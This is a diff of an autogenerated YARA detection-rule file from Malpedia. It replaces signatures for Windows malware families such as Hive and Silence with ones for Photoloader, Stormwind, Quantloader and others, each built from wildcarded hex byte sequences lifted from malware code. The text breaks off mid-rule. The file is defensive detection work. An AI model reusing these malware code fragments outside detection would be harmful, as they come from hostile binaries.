source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.darkpink_auto.yar#L1-L121" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.photoloader" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.photoloader_auto.yar#L1-L159" license_url = "N/A" - logic_hash = "f794d5918ecf33b4e0beff127be6289d027ab1ea81bf4922e3a718a3afdf8df9" + logic_hash = "c73e7831cd0e2d402a5233934c3321f9665203a6373de35d59f2fa5b935ee161" score = 75 quality = 75 tags = "FILE" @@ -160037,34 +162787,40 @@ rule MALPEDIA_Win_Darkpink_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b048d442a4000 ffe0 f7c703000000 7413 } - $sequence_1 = { 57 50 683f000f00 6a00 68???????? 6801000080 } - $sequence_2 = { c3 c705????????08924100 b001 c3 68???????? e8???????? c70424???????? } - $sequence_3 = { 8d41fc 50 56 57 e8???????? 57 } - $sequence_4 = { 8b85b0f8ffff 0fb70485c43c4100 8d0485c0334100 50 8d8590faffff 03c7 50 } - $sequence_5 = { 33f6 8b86f09d4100 85c0 740e } - $sequence_6 = { 68???????? ff75f4 ffd6 85c0 0f85ca000000 50 8d45f8 } - $sequence_7 = { 8b0495f09d4100 f644082801 7421 57 } - $sequence_8 = { e8???????? 6a44 8d45ac 6a00 50 } - $sequence_9 = { 6a26 58 0fb60c85c63c4100 0fb63485c73c4100 8bf9 8985b0f8ffff c1e702 } + $sequence_0 = { 0d00000005 e9???????? 8bd7 397b1c 7640 } + $sequence_1 = { 8bf7 8d6f10 ff15???????? 0f31 } + $sequence_2 = { c0c003 0fb6c8 8bc1 83e10f } + $sequence_3 = { 33c9 b801000000 0fa2 89442420 895c2424 } + $sequence_4 = { 33c9 b800000040 0fa2 895f0c } + $sequence_5 = { 0fa2 894704 33c9 b800000040 } + $sequence_6 = { 895c2424 894c2428 8954242c 0f31 } + $sequence_7 = { f7411400000020 7407 8b41f8 3901 7714 } + $sequence_8 = { 85d2 7417 448bc2 0f31 48c1e220 480bc2 8801 } + $sequence_9 = { 1bc0 23442410 3b03 7418 } + $sequence_10 = { 8903 8d44242c 50 6804010000 ff15???????? ff35???????? 8d4c2430 } + $sequence_11 = { 5d c3 8b4d08 8b45fc 8901 8b450c } + $sequence_12 = { c3 55 8bec 81ec18020000 53 8ad9 } + $sequence_13 = { 8b5604 8d44240c 8b0e 55 } + $sequence_14 = { 51 8d855cffffff 8bf2 68???????? } + $sequence_15 = { 56 33c0 8d6c240c 57 } condition: - 7 of them and filesize <237568 + 7 of them and filesize <107520 } -rule MALPEDIA_Win_Hive_Auto : FILE +rule MALPEDIA_Win_Stormwind_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "d6a0e69c-8ba3-5e7b-a7ea-75f1727a32de" + id = "134843ba-afb3-5108-9e28-7ec5026e872c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hive" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hive_auto.yar#L1-L183" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stormwind" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.stormwind_auto.yar#L1-L126" license_url = "N/A" - logic_hash = "6114f2e9f03828db87c71adf2ad1d3eed20f57d01fa9bb999ecd2843927df4e0" + logic_hash = "81578edc87d2c38ca6c94ce63cf22ed064b72d5bc6a7c525985af57574ba5c73" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -160076,43 +162832,32 @@ rule MALPEDIA_Win_Hive_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 31c0 b91d000000 31d2 31db } - $sequence_1 = { b807000000 b9d4000000 31d2 31db } - $sequence_2 = { 89c2 e8???????? b801000000 e8???????? } - $sequence_3 = { 31c9 31d2 bb54000000 31f6 } - $sequence_4 = { 89d1 e8???????? b802000000 e8???????? } - $sequence_5 = { 31c9 31d2 bb08000000 becb000000 31ff } - $sequence_6 = { 89d0 b90d000000 e8???????? b90d000000 } - $sequence_7 = { 31db 31ff eb31 31c0 } - $sequence_8 = { 31ff e8???????? 833d????????00 7511 } - $sequence_9 = { 89d1 e8???????? b901000000 e8???????? } - $sequence_10 = { 81c4b0000000 c3 e8???????? 90 } - $sequence_11 = { 31c9 31d2 bb09000000 bee0000000 } - $sequence_12 = { 31c0 eb17 0fb6940496000000 0fb674041c 31d6 } - $sequence_13 = { 01c1 83c101 83f90c 0f820fffffff } - $sequence_14 = { 01c1 c1e106 400fb6d6 01ca } - $sequence_15 = { 01c8 c1e006 400fb6cf 01c1 } - $sequence_16 = { 01c1 c1e106 0fb6c2 01c8 } - $sequence_17 = { 01c2 b8ffffff03 21c5 21c3 } - $sequence_18 = { 01c0 4000f8 0fb6c0 48898424b0000000 } - $sequence_19 = { 01ca c1e206 0fb6c3 01d0 } - $sequence_20 = { 01c8 89c1 c1e91f ffc9 } + $sequence_0 = { e8???????? 83c404 8bf7 3b3b 75e2 } + $sequence_1 = { 83e4f8 81ec1c010000 53 8b5d10 56 57 8b7d0c } + $sequence_2 = { e8???????? 83ec0c c745fc00000000 8d4e04 e8???????? 85c0 8b06 } + $sequence_3 = { 50 ff7604 56 e8???????? 894604 c745d801000000 8b4804 } + $sequence_4 = { 59 8b7d08 33db 391cfd88e40410 755c 6a18 e8???????? } + $sequence_5 = { 83fa05 7509 8b852cfdffff 89470c 6bc20c 57 ff90c04e0410 } + $sequence_6 = { 8d4de4 e8???????? 68???????? 8d45e4 c745e4740c0410 50 e8???????? } + $sequence_7 = { f7fe 57 8bc2 99 } + $sequence_8 = { c74508???????? 50 8d4de4 e8???????? 68???????? 8d45e4 c745e4740c0410 } + $sequence_9 = { 8975d4 68b8020000 c645fc01 e8???????? } condition: - 7 of them and filesize <7946240 + 7 of them and filesize <741376 } -rule MALPEDIA_Win_Alphanc_Auto : FILE +rule MALPEDIA_Win_Snojan_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "3e24a753-bd90-55fc-a721-b43ae19ca82e" + id = "96ddba9d-1a09-5178-a027-761c3b0ea160" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.alphanc" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.alphanc_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.snojan" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.snojan_auto.yar#L1-L121" license_url = "N/A" - logic_hash = "76f5a4c48b7d4b7a92e132b26eac0da2bf874f9a491b16e025e278e5810143fc" + logic_hash = "a7da77f2b75075e9b17ce3132c822da8d2432067b99e241b1e6927c5f09a8d94" score = 75 quality = 75 tags = "FILE" @@ -160126,32 +162871,32 @@ rule MALPEDIA_Win_Alphanc_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c3 8b4c2428 85c9 757d 8b4c242c 85c9 7543 } - $sequence_1 = { e8???????? 83c40c 89442410 85c0 0f84f6010000 8b4d14 8b5510 } - $sequence_2 = { eb0a 8b4554 c7400c01000000 8b442414 8b4d54 c74538f0000000 894550 } - $sequence_3 = { 03c1 8b4c2444 13d7 2bc1 8bce 1bd1 8b4c243c } - $sequence_4 = { 8d55f0 6a00 52 6a04 68???????? 57 ff15???????? } - $sequence_5 = { 8b4758 8b8840030000 83f90e 7533 c7805403000001000000 8b4f58 39a978010000 } - $sequence_6 = { 33c0 56 f3ab 8b4e58 8b442424 89a9ec000000 8b5658 } - $sequence_7 = { 8b4c2430 83c420 8d0c49 8d440804 83f808 0f87d7000000 ff248574354600 } - $sequence_8 = { 8d4c2424 51 e8???????? 8d542454 52 e8???????? 8d442470 } - $sequence_9 = { 8b4804 83f905 8954241c 7529 8b5048 55 52 } + $sequence_0 = { ff15???????? 83ec0c 83f8ff 0f8487010000 89c7 b802000000 c70424???????? } + $sequence_1 = { b802000000 c70424???????? 6689442420 ff15???????? 83ec04 c70424???????? 89442424 } + $sequence_2 = { 8d5c2430 c644241f00 c744240c00000000 c744240800900100 895c2404 893c24 ff15???????? } + $sequence_3 = { a1???????? 8b988000986d 85db 74da } + $sequence_4 = { 8d860000986d 8955cc e8???????? 8b45cc } + $sequence_5 = { 893c24 ff15???????? 83ec10 83f800 } + $sequence_6 = { e9???????? 0fb7810000986d 894dc0 89c7 81cf0000ffff 6683b90000986d00 0f48c7 } + $sequence_7 = { 85c0 74e9 a1???????? 8b988000986d 85db 74da 895c2404 } + $sequence_8 = { 837c243401 753d c744241400000000 c744241000000000 } + $sequence_9 = { 85c0 b801000000 0f44d0 8854241f 8974240c 896c2408 } condition: - 7 of them and filesize <2015232 + 7 of them and filesize <90112 } -rule MALPEDIA_Win_Knot_Auto : FILE +rule MALPEDIA_Win_Devopt_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a6e6a5bf-ddf5-50fd-bee4-72bdce46b16d" + id = "b2799a63-9237-56b1-b622-1d4cf3bf7ea8" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.knot" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.knot_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.devopt" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.devopt_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "1eb2f0d25dde1dc340b502f0b94dbb26bfbabe3643f1c7382f79e2ee4892b78f" + logic_hash = "f040e8bf75c02b10fb9ecd2b3e85bb747221bae38ed54254a620b66ea3085268" score = 75 quality = 75 tags = "FILE" @@ -160165,34 +162910,34 @@ rule MALPEDIA_Win_Knot_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 8b8ddcfdffff 51 6a00 6a00 6a01 } - $sequence_1 = { 55 8bec 81ec34010000 6a00 } - $sequence_2 = { 6a18 6a00 6a00 68???????? ff15???????? 8d95f0f9ffff } - $sequence_3 = { ff15???????? 83c408 6a01 6a00 } - $sequence_4 = { 83bdd4fdffff00 7443 8b85d8fdffff 50 8b8ddcfdffff 51 } - $sequence_5 = { 6800000040 8d95e0fdffff 52 ff15???????? } - $sequence_6 = { ff15???????? 8b55ec 52 ff15???????? 8b45e8 50 ff15???????? } - $sequence_7 = { 6a00 6a00 68???????? ff15???????? 8d95f0f9ffff 52 e8???????? } - $sequence_8 = { 52 ff15???????? 85c0 7507 32c0 e9???????? c785d8fdffff00000000 } - $sequence_9 = { 83c408 68???????? 8b8d74f7ffff 51 e8???????? } + $sequence_0 = { eb42 8b45fc f7402810000000 7402 eb34 8b45fc 80b8a900000000 } + $sequence_1 = { eb11 3b5df0 7e02 eba3 8d7600 c745f0ffffffff 8b45f0 } + $sequence_2 = { eb0b 8b45fc 8b4034 8945d4 eb25 8b45d0 83e00f } + $sequence_3 = { ff9240040000 84c0 7502 eb0b 8b55f8 8b45fc e8???????? } + $sequence_4 = { e8???????? 8b45f4 ba???????? 8955e8 8945ec 8d55e8 31c0 } + $sequence_5 = { 8b4240 8b55f4 8b4a40 8b11 ff5268 8945f0 89d7 } + $sequence_6 = { ff93a8020000 8b45d4 8d40fc 50 8b45d0 8d48fc 8b45f8 } + $sequence_7 = { 8d6424e0 53 8945f4 8955fc 894df8 837dfc00 7e02 } + $sequence_8 = { ff75f0 ff75fc e8???????? 31d2 58 83c40c 648902 } + $sequence_9 = { eb1e 8b45f8 a9ffffffff 7402 eb12 8b45f4 e8???????? } condition: - 7 of them and filesize <59392 + 7 of them and filesize <4645888 } -rule MALPEDIA_Win_Silence_Auto : FILE +rule MALPEDIA_Win_Quantloader_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f44b3bc4-8edd-502b-bd51-3105b7335797" + id = "4febf63d-0f98-5ee5-9cc6-9fa1c2da1c7c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.silence" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.silence_auto.yar#L1-L413" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.quantloader" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.quantloader_auto.yar#L1-L175" license_url = "N/A" - logic_hash = "c771c849ed5f5e02e308e7f1e45bb9b0766da378108a761728400240a10fde1e" + logic_hash = "02e93017f3318c384f200ca1e9ba6b581c4815c155dd61d906306a2c75ce48f2" score = 75 - quality = 50 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -160204,70 +162949,39 @@ rule MALPEDIA_Win_Silence_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d45fc 50 6a00 6a00 68???????? c745fc00000000 } - $sequence_1 = { 740a 8a4801 40 84c9 75f4 eb05 803800 } - $sequence_2 = { 8b4908 e8???????? cc 8325????????00 c3 6a08 } - $sequence_3 = { 683f020f00 6a00 68???????? 6801000080 ff15???????? 68???????? } - $sequence_4 = { 3b0d???????? 7502 f3c3 e9???????? e8???????? e9???????? 6a14 } - $sequence_5 = { 68???????? ffd6 8b45fc 85c0 } - $sequence_6 = { ff15???????? 6a00 6800000004 6a00 } - $sequence_7 = { 46 56 8d85f8feffff 50 } - $sequence_8 = { 6801000080 ff15???????? 56 8d85f8feffff } - $sequence_9 = { 8bd8 68???????? 53 ff15???????? 6a00 } - $sequence_10 = { 8b35???????? 6a00 6a00 6a00 6a00 8d45fc 50 } - $sequence_11 = { 6a00 8bf8 6a00 57 ff15???????? 8d45fc 50 } - $sequence_12 = { 40 84c9 75f4 eb0d 803800 7408 } - $sequence_13 = { 803800 7408 8a5a01 42 84db } - $sequence_14 = { 5e 5b 5d c3 c60200 42 } - $sequence_15 = { 8d85b8f7ffff 50 6800080000 8d85bcf7ffff } - $sequence_16 = { 8b85b8f7ffff 85c0 75b6 ffb5acf7ffff } - $sequence_17 = { 83c41c 895ef8 897ef0 5b 5f } - $sequence_18 = { 8bf9 e8???????? ff37 8b35???????? } - $sequence_19 = { ff501c 8b17 8bcf ff5210 8b17 } - $sequence_20 = { 7412 8b01 52 8d95f0fdffff 52 ff10 } - $sequence_21 = { 8d8dfcfbffff 51 ffb5f0fbffff 8bcb ff5038 } - $sequence_22 = { 0346f4 57 ff7508 50 e8???????? 83c40c } - $sequence_23 = { 03d7 3b56f0 7611 8b46ec } - $sequence_24 = { 85c9 7408 8b06 51 8bce ff501c } - $sequence_25 = { d3e0 0fb6c8 8b05???????? d3e0 } - $sequence_26 = { ff15???????? ba180c0000 b940000000 ff15???????? } - $sequence_27 = { ff15???????? 488d542430 488d8c2440020000 ff15???????? } - $sequence_28 = { 8b05???????? d3e0 8b0d???????? 03c8 } - $sequence_29 = { e8???????? ba00040000 b940000000 ff15???????? } - $sequence_30 = { ff15???????? 41b804010000 488d542430 488d4c2430 ff15???????? 85c0 } - $sequence_31 = { d3f8 0fb60d???????? d3e0 85c0 } - $sequence_32 = { 99 83e203 03c2 c1f802 89442440 } - $sequence_33 = { ff15???????? c20800 53 8b1d???????? 57 0f57c0 } - $sequence_34 = { 5e 85c0 7507 68???????? ffd7 5f } - $sequence_35 = { 7507 68???????? ffd7 6a00 6a00 6a01 6a00 } - $sequence_36 = { 750e 68???????? ff15???????? c20800 } - $sequence_37 = { 8d0441 33d2 b905000000 f7f1 } - $sequence_38 = { c705????????00000000 c705????????00000000 ffd3 8b3d???????? 85c0 7507 } - $sequence_39 = { 68???????? ff15???????? a3???????? 85c0 750e 68???????? } - $sequence_40 = { 8bec ff4d08 755d 833d????????04 7554 } - $sequence_41 = { c705????????04000000 ff15???????? 85c0 750b 68???????? ff15???????? } - $sequence_42 = { ff15???????? 68c0d40100 ff15???????? e9???????? } - $sequence_43 = { 03048db0354200 50 ff15???????? 5d } - $sequence_44 = { 0305???????? 0b45f0 3305???????? a3???????? } - $sequence_45 = { 03048db0354200 eb02 8bc6 80782900 } - $sequence_46 = { 03048db0354200 eb05 b8???????? f6402820 } + $sequence_0 = { 8d85f8fdffff 890424 e8???????? 8d85f8fdffff 890424 e8???????? } + $sequence_1 = { e8???????? c7442404???????? c70424???????? e8???????? 8b450c } + $sequence_2 = { e8???????? 85c0 750c c70424???????? e8???????? c70424???????? } + $sequence_3 = { e8???????? 85c0 0f94c0 0fb6d8 c744240801000000 8b45f8 } + $sequence_4 = { 89442404 c7042400000000 e8???????? 83ec0c 8d85f8f7ffff 89442404 } + $sequence_5 = { c744240400000000 c70424???????? e8???????? 83ec14 8945f4 } + $sequence_6 = { c70424???????? e8???????? c744240800000000 c7442404???????? c70424???????? } + $sequence_7 = { 817d08???????? 7470 817d0c00704000 7467 8b4508 803800 } + $sequence_8 = { 8d341e 66ad 6633d0 75df } + $sequence_9 = { 75f1 5e 8bc6 8bf7 3bc5 7403 } + $sequence_10 = { 61 c3 60 8bd3 8bf2 03763c 2b5634 } + $sequence_11 = { 837d5400 7425 64ff3530000000 59 8b490c 8b490c } + $sequence_12 = { ff30 6800100000 57 81042400100000 ff550c } + $sequence_13 = { 61 c3 58 ffd0 837c240802 7414 64a118000000 } + $sequence_14 = { 5d 8bc4 ff7010 ff700c ff7008 ff5550 e8???????? } + $sequence_15 = { 85c0 741b a900000080 7504 8d440302 25ffffff7f } condition: - 7 of them and filesize <70128640 + 7 of them and filesize <155648 } -rule MALPEDIA_Win_Bhunt_Auto : FILE +rule MALPEDIA_Win_Crutch_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5486e0c5-654b-5b43-b68d-10c1b78a90c9" + id = "1c62c9a2-5abd-50e0-9062-2bd78d3ac79d" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bhunt" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bhunt_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crutch" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.crutch_auto.yar#L1-L133" license_url = "N/A" - logic_hash = "f1702c9f5cf7c98ee774218c3a385f625fff81483374971b8b6cf77e6b060de8" - score = 50 + logic_hash = "af046e99ef1615cf66ae4969fa3fcc0ac2b09e87e76d784694e80263151a794f" + score = 75 quality = 75 tags = "FILE" version = "1" @@ -160280,32 +162994,32 @@ rule MALPEDIA_Win_Bhunt_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { feca f8 d0c2 f5 f8 32da 80ffd4 } - $sequence_1 = { 85c0 751a 8b442410 50 8bd5 8bc3 e8???????? } - $sequence_2 = { 8902 660fbcc0 8b07 8dbf04000000 663bcf 66f7c4ab75 33c3 } - $sequence_3 = { bbff000000 8bc3 8d7c2414 66c784241e1200000800 e8???????? 59 8d8600120000 } - $sequence_4 = { 0fb7c2 8b55f0 03450c 2bd1 0fb74dfc } - $sequence_5 = { ff7304 c645d405 56 e8???????? ff7304 ff36 e8???????? } - $sequence_6 = { 83a530ffffff00 c7852cffffff01000000 ffb530ffffff ffb52cffffff 52 ffb544ffffff e8???????? } - $sequence_7 = { 5f 9c 04f8 26ed c59818579fa0 5f e7e6 } - $sequence_8 = { 52 3a21 a7 a2???????? 50 9d 03890023b0b3 } - $sequence_9 = { ac 2a7279 bfae9603f7 6c a3???????? 9f 97 } + $sequence_0 = { 7536 8b8740030000 f7404000c00000 51 740f 8b4e6c 51 } + $sequence_1 = { 8b442430 85c0 742b 8b942488000000 8b8c2484000000 52 8b54243c } + $sequence_2 = { 8b01 50 ff30 51 ff32 8bcb e8???????? } + $sequence_3 = { 50 8d4ddc e8???????? eb3a 8dbd1cffffff 8d3cd7 8d8514ffffff } + $sequence_4 = { 8b6c2408 7426 8b03 50 ff15???????? 8b8efc040000 51 } + $sequence_5 = { 0f84f9000000 b9???????? 8bc6 8d642400 8a10 3a11 751a } + $sequence_6 = { 81c2cc000000 89542408 8b54240c 89542404 e9???????? 81f9244e0000 } + $sequence_7 = { 7506 8b7c2428 eb4a 41 51 ff15???????? 8bf8 } + $sequence_8 = { b823000000 5e c3 8d471f c1e004 8bcf c1e104 } + $sequence_9 = { 8bf1 8a02 8806 8d4e18 8b4208 894608 8b420c } condition: - 7 of them and filesize <19161088 + 7 of them and filesize <1067008 } -rule MALPEDIA_Win_Winsloader_Auto : FILE +rule MALPEDIA_Win_Moriya_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "3816b057-ecfc-5190-8abf-a0a65a8930f8" + id = "b9f54a0c-1b70-575c-9b58-fd559fcd85cb" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.winsloader" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.winsloader_auto.yar#L1-L171" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.moriya" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.moriya_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "2eada578907b5f770ab8c1dc3588915ff9d4c97daa18d7827115e92744f234da" + logic_hash = "ab28f31770f9afce25a3c5b829bb0d33a4cf408b2c3f7c40efc1893d68c2419a" score = 75 quality = 75 tags = "FILE" @@ -160319,38 +163033,32 @@ rule MALPEDIA_Win_Winsloader_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83c40c 6800040000 8d8dfcf7ffff 51 } - $sequence_1 = { 8bf8 83c434 85ff 7510 } - $sequence_2 = { 89941d02fcffff 89841d06fcffff b8???????? 898c1d0afcffff 83c410 } - $sequence_3 = { 68???????? 51 e8???????? 68???????? 8d5c3e04 e8???????? } - $sequence_4 = { 898c1d0afcffff 83c410 66c7841d0efcffff4501 8d7001 8a08 } - $sequence_5 = { 8d8375050000 6a00 a3???????? ff15???????? } - $sequence_6 = { 0fb7c0 8bf0 6689841d10fcffff 56 83c316 8d941dfcfbffff 68???????? } - $sequence_7 = { f3a5 66a5 8b15???????? 8990fa0d0000 8b0d???????? } - $sequence_8 = { 8bd8 c745fcffffffff 85db 7516 56 e8???????? } - $sequence_9 = { c3 e8???????? 85c0 0f8487660000 c3 833d????????ff 7503 } - $sequence_10 = { 894dfc 80fb08 750f 32db } - $sequence_11 = { 33c0 40 e9???????? 8365c800 c745cc231a0110 a1???????? 8d4dc8 } - $sequence_12 = { 8d940dfcfbffff 52 e8???????? 83c40c 0fb685f7f3ffff } - $sequence_13 = { c1e100 8b9568f3ffff 8991a8ad0110 8b85f8f3ffff 05b4130000 668985f0f3ffff } - $sequence_14 = { 8841ff 83ea01 75f2 8b542424 8a1a 8d4701 50 } - $sequence_15 = { 8b049594440110 8985ccf6ffff 85c0 757c 50 8985d4f4ffff 89855cfcffff } + $sequence_0 = { 8bce ff15???????? 4533c0 488d0dcf260000 33d2 } + $sequence_1 = { 488bfa 4c8d051c0d0000 33d2 8d5a4d 8bcb ff15???????? 4c8d05280d0000 } + $sequence_2 = { 8b4f10 8d81fffeffff 83f801 7608 81f910010000 7564 ba28000000 } + $sequence_3 = { 448d724d 418bce 0f114dc0 0f1145d0 ff15???????? } + $sequence_4 = { 4885c0 7509 4c8d05b60f0000 eba3 4c8d05dd0f0000 ff15???????? } + $sequence_5 = { ff15???????? 488b8c2498000000 4885c9 7405 e8???????? } + $sequence_6 = { ff15???????? 8bc3 488b8c2488000000 4833cc e8???????? 4881c490000000 415f } + $sequence_7 = { 33d2 ff15???????? 4883673800 488b0d???????? 4885c9 7467 } + $sequence_8 = { 4c8bc3 49ffc0 42803c0000 75f6 488b15???????? } + $sequence_9 = { 488b0d???????? 4885c9 7405 e8???????? 8bc7 488b4df0 } condition: - 7 of them and filesize <270336 + 7 of them and filesize <58368 } -rule MALPEDIA_Win_Boaxxe_Auto : FILE +rule MALPEDIA_Win_Scout_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "d2861d72-2434-5a6e-bbf4-9290c68bd235" + id = "782e8973-04d4-5ac6-ba73-37d8fadd11cc" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.boaxxe" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.boaxxe_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.scout" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.scout_auto.yar#L1-L113" license_url = "N/A" - logic_hash = "232a66e4610caa68487a07fb0b6c51bc622cacc6954ed1eec17df693514e555a" + logic_hash = "5102c52e17a0c63528d1a50969c6684ed49d0991b2b60fe184c02299aec673c2" score = 75 quality = 75 tags = "FILE" @@ -160364,32 +163072,32 @@ rule MALPEDIA_Win_Boaxxe_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { b904000000 e8???????? 8d55c4 66b8c503 e8???????? 8b55c4 a1???????? } - $sequence_1 = { 0f8c88000000 8d4df4 8b55f8 8b45f8 e8???????? 8b55f4 8d45f8 } - $sequence_2 = { 83c220 8d45f8 e8???????? 8d45f8 e8???????? 8945f4 8b45f4 } - $sequence_3 = { 33c0 55 68???????? 64ff30 648920 8bcb b230 } - $sequence_4 = { 85db 7410 8b55f4 8b45ec 8bcb e8???????? } - $sequence_5 = { 8b45cc e8???????? 8bd8 891d???????? 891d???????? 8d45c8 50 } - $sequence_6 = { 01d0 c1e003 8b803c58bc6d 8945ec e9???????? 837de808 } - $sequence_7 = { a1???????? e8???????? 8bd0 53 8bc2 e9???????? 33c0 } - $sequence_8 = { 0342fc 8945ec 8b45f8 8b00 8b5508 0342fc 8945f0 } - $sequence_9 = { b808000000 e8???????? 8b55f8 58 e8???????? 7504 33db } + $sequence_0 = { 488d537c 41b888140000 488d4df0 e8???????? 41b904000000 } + $sequence_1 = { 498bf9 8b0a e8???????? 90 488d1d86780100 488d356f630100 } + $sequence_2 = { 736b 488bc3 488bf3 48c1fe06 4c8d2d4ef80000 } + $sequence_3 = { 4d8bf8 488bc6 48894df7 488945ef 488d0d36fbfeff 83e03f 458be9 } + $sequence_4 = { 488d1520d50000 b805000000 894520 894528 } + $sequence_5 = { 7566 b804000000 660f1f840000000000 488d8980000000 } + $sequence_6 = { e8???????? 33c0 488b8d90140000 4833cc e8???????? } + $sequence_7 = { c745dca8837182 0f1045d0 c744242801000000 8905???????? } + $sequence_8 = { 4c89742438 4c897c2430 ff15???????? 33d2 } + $sequence_9 = { 75dd 488d05e31b0100 483bd8 74d1 488bcb } condition: - 7 of them and filesize <1146880 + 7 of them and filesize <315392 } -rule MALPEDIA_Win_Stinger_Auto : FILE +rule MALPEDIA_Win_Runningrat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "03e2d1ca-b846-5787-b683-28feb74dae3e" + id = "dfc93b52-63e2-55d7-a28a-ac61edd067cb" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stinger" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.stinger_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.runningrat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.runningrat_auto.yar#L1-L161" license_url = "N/A" - logic_hash = "64d2d0bb18e9f4889ac80d1e49c5ab473a950fa26645e6f561f71db4e8eb08f3" + logic_hash = "93ccf5e13fdb9515ec5cdc43025f3b9796a39f81cb6409c0f2fa39eb59211d22" score = 75 quality = 75 tags = "FILE" @@ -160403,32 +163111,37 @@ rule MALPEDIA_Win_Stinger_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8bec 81ec10000000 6804000080 6a00 8b5d08 } - $sequence_1 = { f6c441 0f854d010000 8b45f4 50 8b5d08 ff33 } - $sequence_2 = { 895df8 8965f4 ff75fc ff15???????? 90 90 } - $sequence_3 = { 6806000000 e8???????? 83c404 e9???????? 8be5 5d c21000 } - $sequence_4 = { e9???????? 68???????? 8b5d0c ff33 e8???????? 83c408 } - $sequence_5 = { a1???????? 85c0 891c85ecbe4000 750a } - $sequence_6 = { 6806000000 e8???????? 83c404 a3???????? 8965f8 68???????? } - $sequence_7 = { ff75fc 6802000000 bb94020000 e8???????? 83c41c 8945e8 } - $sequence_8 = { 6800000000 6800000000 68???????? ff35???????? 6800000000 ff15???????? 90 } - $sequence_9 = { 8b5d08 